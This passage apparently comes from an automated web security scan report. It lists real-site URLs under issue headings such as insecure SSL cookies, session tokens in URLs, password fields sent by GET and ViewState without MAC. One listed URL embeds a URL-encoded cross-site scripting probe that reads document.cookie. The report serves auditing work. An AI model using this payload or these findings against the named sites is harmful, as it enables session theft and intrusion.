6.262. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html

6.263. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html

6.264. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

6.265. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html

6.266. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

6.267. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html

6.268. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

6.269. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

6.270. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

6.271. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

6.272. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

6.273. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

6.274. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

6.275. http://www.x64bitdownload.com/drivers/

6.276. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html

6.277. http://www.x64bitdownload.com/featured-software.html

6.278. http://www.x64bitdownload.com/linktous.html

6.279. http://www.x64bitdownload.com/new-reviews.html

6.280. http://www.x64bitdownload.com/new-software.html

6.281. http://www.x64bitdownload.com/saved-software.html

6.282. http://www.x64bitdownload.com/saved-software.html

6.283. http://www.x64bitdownload.com/software-advanced.html

6.284. http://www.x64bitdownload.com/submit-pad-file.html

6.285. http://www.x64bitdownload.com/tellafriend.html

6.286. http://www.x64bitdownload.com/top-software-downloads.html

7. SQL statement in request parameter

8. SSL cookie without secure flag set

8.1. https://acc.newsguy.com/a/memsubmit.asp

8.2. https://billing.cloudaccess.net/cart.php

8.3. https://www.bmwusa.com/Secured/FrameCheck.aspx

8.4. https://www.isc.org/software/inn

8.5. https://acc.newsguy.com/user/-/accnt_billing

8.6. https://acc.newsguy.com/user/-/accnt_contact

8.7. https://acc.newsguy.com/user/-/accnt_flash

8.8. https://acc.newsguy.com/user/-/accnt_history

8.9. https://acc.newsguy.com/user/-/customer_referrals

8.10. https://acc.newsguy.com/user/-/referrals_cashout

8.11. https://acc.newsguy.com/user/accnt_overview

8.12. https://acc.newsguy.com/user/accnt_renew

8.13. https://acc.newsguy.com/user/accnt_settings

8.14. https://acc.newsguy.com/user/accnt_signup_usenet

8.15. https://acc.newsguy.com/user/accnt_upgrade

8.16. https://github.com/DataSift/TweetMeme-Chrome-Extension

8.17. https://maps-api-ssl.google.com/maps

8.18. https://sell.autotrader.com/syc/syc_center.jsf/x22

8.19. https://www.bmwusa.com/ScriptResource.axd

8.20. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

8.21. https://www.bmwusa.com/Secured/NaN

8.22. https://www.bmwusa.com/WebResource.axd

8.23. https://www.bmwusa.com/jsenvconst.ashx

8.24. https://www.cloudaccess.net/copyright-policy.html

8.25. https://www.cloudaccess.net/network-report.html

8.26. https://www.cloudaccess.net/network-sla.html

8.27. https://www.cloudaccess.net/privacy-policy.html

8.28. https://www.cloudaccess.net/support-sla.html

8.29. https://www.cloudaccess.net/terms-of-service.html

8.30. https://www.paypal.com/cgi-bin/webscr

8.31. https://www.tuenti.com/

9. Session token in URL

9.1. http://autotrader.tt.omtrdc.net/m2/autotrader/mbox/standard

9.2. http://bh.contextweb.com/bh/set.aspx

9.3. http://feedburner.google.com/fb/a/mailverify

9.4. http://groups.google.com/group/joomla-commits/topics

9.5. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.6. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.7. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.8. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.9. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.10. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.11. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.12. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.13. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.14. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.15. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.16. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

9.17. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.18. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.19. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1417680846/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.20. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.21. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.22. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.23. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.24. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.25. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.26. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.27. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.28. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.29. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.30. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.31. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.32. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.33. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.34. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.35. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.36. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.37. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.38. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.39. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.40. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.41. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.42. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.43. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.44. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.45. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.46. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.47. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.48. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.49. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.50. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.51. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.52. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.53. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.54. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.55. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.56. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.57. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.58. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.59. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.60. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.61. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

9.62. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81555351/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.63. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/843686845/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.64. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

9.65. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

9.66. http://www.amazon.com/

9.67. http://www.amazon.com/Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22

9.68. http://www.amazon.com/Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22

9.69. http://www.amazon.com/b/

9.70. http://www.amazon.com/dp/0313363153

9.71. http://www.amazon.com/dp/0814410960

9.72. http://www.amazon.com/dp/B000EFAO1G

9.73. http://www.amazon.com/dp/B001AIM6V2

9.74. http://www.amazon.com/dp/B0037UT1LY

9.75. http://www.amazon.com/gp/product/0596804946

9.76. http://www.amazon.com/gp/site-directory/x22

9.77. http://www.apture.com/js/apture.js

9.78. http://www.dzone.com/links/add.html

9.79. http://www.facebook.com/extern/login_status.php

9.80. http://www.metacafe.com/fplayer/

9.81. http://www.mindbodygreen.com/passvote.action

9.82. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue

9.83. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html

9.84. http://www.officedepot.com/promo.do

9.85. http://www1.whdh.com/features/articles/holiday_helping/BO144709/

9.86. http://www1.whdh.com/features/articles/holiday_helping/BO144719/

9.87. http://www1.whdh.com/features/articles/holiday_helping/BO144727/

9.88. http://www1.whdh.com/features/articles/holiday_helping/BO144733/

10. SSL certificate

10.1. https://acc.newsguy.com/

10.2. https://billing.cloudaccess.net/

10.3. https://www.cloudaccess.net/

11. Password field submitted using GET method

11.1. http://www.americascupmedia.com/index.php

11.2. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html

12. ASP.NET ViewState without MAC enabled

12.1. http://beta-ads.ace.advertising.com/

12.2. http://p.ace.advertising.com/

12.3. http://r1-ads.ace.advertising.com/

12.4. http://r1.ace.advertising.com/

12.5. http://www.lynda.com/landing/softwaretraining.aspx

13. Cookie scoped to parent domain

13.1. http://7newsboston.disqus.com/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/

13.2. http://news.cnet.com/

13.3. http://t.mookie1.com/t/v1/imp

13.4. http://www.amazon.com/

13.5. http://www.amazon.com/Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22

13.6. http://www.amazon.com/Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22

13.7. http://www.amazon.com/b/

13.8. http://www.amazon.com/books-used-books-textbooks/b

13.9. http://www.amazon.com/dp/0313363153

13.10. http://www.amazon.com/dp/0814410960

13.11. http://www.amazon.com/dp/B000EFAO1G

13.12. http://www.amazon.com/dp/B001AIM6V2

13.13. http://www.amazon.com/dp/B0037UT1LY

13.14. http://www.amazon.com/dvds-used-hd-action-comedy-oscar/b

13.15. http://www.amazon.com/gp/css/homepage.html/x22

13.16. http://www.amazon.com/gp/gc/x22

13.17. http://www.amazon.com/gp/product/0596804946

13.18. http://www.amazon.com/gp/site-directory/x22

13.19. http://www.amazon.com/music-rock-classical-pop-jazz/b

13.20. http://www.amazon.com/toys/b

13.21. http://www.amazon.com/wishlist/x22

13.22. http://www.amazon.com/x22

13.23. http://www.amazon.com/x22/x3e/x3cli

13.24. http://www.aspirationtech.org/

13.25. http://www.boats.com/

13.26. http://www.careersingear.com/

13.27. http://www.carmax.com/

13.28. http://www.diigo.com/post

13.29. http://www.directstartv.com/

13.30. https://www.isc.org/software/inn

13.31. http://www.metacafe.com/fplayer/

13.32. http://www.myspace.com/Modules/PostTo/Pages/

13.33. http://www.myspace.com/netlingo

13.34. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue

13.35. http://www.opensource.org/licenses/bsd-license.php

13.36. http://www.opensource.org/licenses/gpl-license.php

13.37. http://www.opensource.org/licenses/mit-license.php

13.38. http://www.packtpub.com/award

13.39. http://www.stumbleupon.com/submit

13.40. http://www.t-mobile.com/Company/Community.aspx

13.41. http://a.tribalfusion.com/i.cid

13.42. https://acc.newsguy.com/a/memsubmit.asp

13.43. https://acc.newsguy.com/user/-/accnt_billing

13.44. https://acc.newsguy.com/user/-/accnt_contact

13.45. https://acc.newsguy.com/user/-/accnt_flash

13.46. https://acc.newsguy.com/user/-/accnt_history

13.47. https://acc.newsguy.com/user/-/customer_referrals

13.48. https://acc.newsguy.com/user/-/referrals_cashout

13.49. https://acc.newsguy.com/user/accnt_overview

13.50. https://acc.newsguy.com/user/accnt_renew

13.51. https://acc.newsguy.com/user/accnt_settings

13.52. https://acc.newsguy.com/user/accnt_signup_usenet

13.53. https://acc.newsguy.com/user/accnt_upgrade

13.54. http://action.media6degrees.com/orbserv/hbpix

13.55. http://ad.doubleclick.net/click

13.56. http://ad.turn.com/server/ads.js

13.57. http://ads.adbrite.com/adserver/behavioral-data/8201

13.58. http://ads.doclix.com/adserver/CntImprImg

13.59. http://ads.pointroll.com/PortalServe/

13.60. http://ads.revsci.net/adserver/ako

13.61. http://ads.traderonline.com/RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1888828924@Right1

13.62. http://adserver.teracent.net/tase/ad

13.63. http://adserver.teracent.net/tase/redir/1295921988188_58040565_as2108_imp/vew

13.64. https://adwords.google.com/select/Login

13.65. http://ak1.abmr.net/is/r1-ads.ace.advertising.com

13.66. http://as2.whdh.com/m/m.php/1295906131129/m.gif

13.67. http://at.amgdgt.com/ads/

13.68. http://b.collective-media.net/seg/cm/de18_1

13.69. http://b.scorecardresearch.com/b

13.70. http://b.scorecardresearch.com/r

13.71. http://bh.contextweb.com/bh/set.aspx

13.72. http://bid.openx.net/json

13.73. http://bid.openx.net/json

13.74. http://bid.openx.net/log

13.75. http://blogsearch.google.com/

13.76. http://books.google.com/bkshp

13.77. http://books.google.com/books

13.78. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.79. http://c7.zedo.com/OzoDB/cutils/R52_9/jsc/305/egc.js

13.80. http://c7.zedo.com/bar/v16-401/c5/jsc/gl.js

13.81. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html

13.82. http://click.linksynergy.com/fs-bin/click

13.83. http://code.google.com/p/swfobject/

13.84. http://cspix.media6degrees.com/orbserv/hbpix

13.85. http://dave.willfork.com/slrnface/

13.86. http://delb.opt.fimserve.com/fimbid/

13.87. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23

13.88. http://dp.specificclick.net/

13.89. http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json

13.90. http://feedburner.google.com/fb/a/mailverify

13.91. http://groups.google.com/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22

13.92. http://groups.google.com/group/joomla-commits/topics

13.93. http://groups.google.com/groups

13.94. http://groups.google.com/grphp

13.95. http://hairmakeup.tweetmeme.com/

13.96. http://howto.tweetmeme.com/

13.97. http://ib.adnxs.com/getuid

13.98. http://ib.adnxs.com/mapuid

13.99. http://ib.adnxs.com/seg

13.100. http://id.google.com/verify/EAAAAKBO9UY0zgnYsHCeZqjfAho.gif

13.101. http://idpix.media6degrees.com/orbserv/hbpix

13.102. http://il.youtube.com/watch

13.103. http://images.google.com/images

13.104. http://iphone.tweetmeme.com/

13.105. http://js.revsci.net/gateway/gw.js

13.106. http://justinbieber.tweetmeme.com/

13.107. http://k.collective-media.net/cmadj/cm.martini/

13.108. http://khm0.google.com/kh/v/x3d76/x26

13.109. http://khm1.google.com/kh/v/x3d76/x26

13.110. http://khmdb0.google.com/kh

13.111. http://khmdb1.google.com/kh

13.112. http://leadback.advertising.com/adcedge/lb

13.113. http://loadus.exelator.com/load/

13.114. https://maps-api-ssl.google.com/maps

13.115. http://maps.google.com/maps

13.116. http://maps.google.com/maps/place

13.117. http://media.fastclick.net/w/pg

13.118. http://media.fastclick.net/w/tre

13.119. http://media.fastclick.net/w/win.bid

13.120. http://metrics.autobytel.com/b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011

13.121. http://metrics.traderonline.com/b/ss/detraderonline/1/H.17/s93964351669419

13.122. http://mig.nexac.com/2/B3DM/DLX/1@x96

13.123. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3

13.124. http://news.google.com/news/story

13.125. http://news.google.com/nwshp

13.126. http://news.webshots.com/photo/1059414821042998563QWNlxQ/x22

13.127. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1264761221@Top,Middle,Right,Right1,x01,x02,x03,x04

13.128. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1682116568@Top,Middle,Right,Right1,x01,x02,x03,x04

13.129. http://pc3.yumenetworks.com/dynamic_btx/118_12345

13.130. http://picasaweb.google.com/home

13.131. http://picasaweb.google.com/lh/view

13.132. http://ping.crowdscience.com/ping.js

13.133. http://pix01.revsci.net/H05525/b3/0/3/360/1/0/12DBAF7B7D9/0/0/00000000/722681440.gif

13.134. http://pix04.revsci.net/D08734/a1/0/3/0.js

13.135. http://pix04.revsci.net/D08734/a3/0/3/0.gif

13.136. http://pix04.revsci.net/G07610/b3/0/3/1003161/657607877.gif

13.137. http://pix04.revsci.net/K04491/b3/0/3/1003161/978210799.js

13.138. http://pix04.revsci.net/K04491/b3/0/3/1003161/978210799.js

13.139. http://pixel.33across.com/ps/

13.140. http://pixel.mathtag.com/event/img

13.141. http://pixel.quantserve.com/pixel

13.142. http://pixel.quantserve.com/seg/p-9dsZX-5zhUuTg.js

13.143. http://pixel.rubiconproject.com/tap.php

13.144. http://r.turn.com/r/bd

13.145. http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64

13.146. http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

13.147. http://rcm.amazon.com/e/cm

13.148. http://rd.apmebf.com/w/pg

13.149. http://scholar.google.com/schhp

13.150. http://scholar.google.com/scholar

13.151. http://segment-pixel.invitemedia.com/pixel

13.152. http://segment-pixel.invitemedia.com/unpixel

13.153. http://shopping.tweetmeme.com/

13.154. http://smallbusinessnews.tweetmeme.com/

13.155. http://smp.specificmedia.com/smp/v=5

13.156. http://su.addthis.com/red/usync

13.157. http://tacoda.at.atwola.com/rtx/r.js

13.158. http://tags.bluekai.com/site/10

13.159. http://tags.bluekai.com/site/2981

13.160. http://translate.google.com/

13.161. http://translate.google.com/translate_t

13.162. http://ugg.tweetmeme.com/

13.163. http://video.google.com/

13.164. http://video.google.com/videosearch

13.165. http://www.apture.com/js/apture.js

13.166. http://www.automotive.com/x22

13.167. http://www.autotrader.com/fyc/index.jsp/x22

13.168. http://www.autotrader.com/hornav/trader/index.jsp/x22

13.169. http://www.autotrader.com/no_cache/ac/trader_clicks_0001_nocount.asis

13.170. http://www.autotrader.com/no_cache/ac/trader_clicks_0002_nocount.asis

13.171. http://www.autotrader.com/no_cache/ac/trader_clicks_0005_nocount.asis

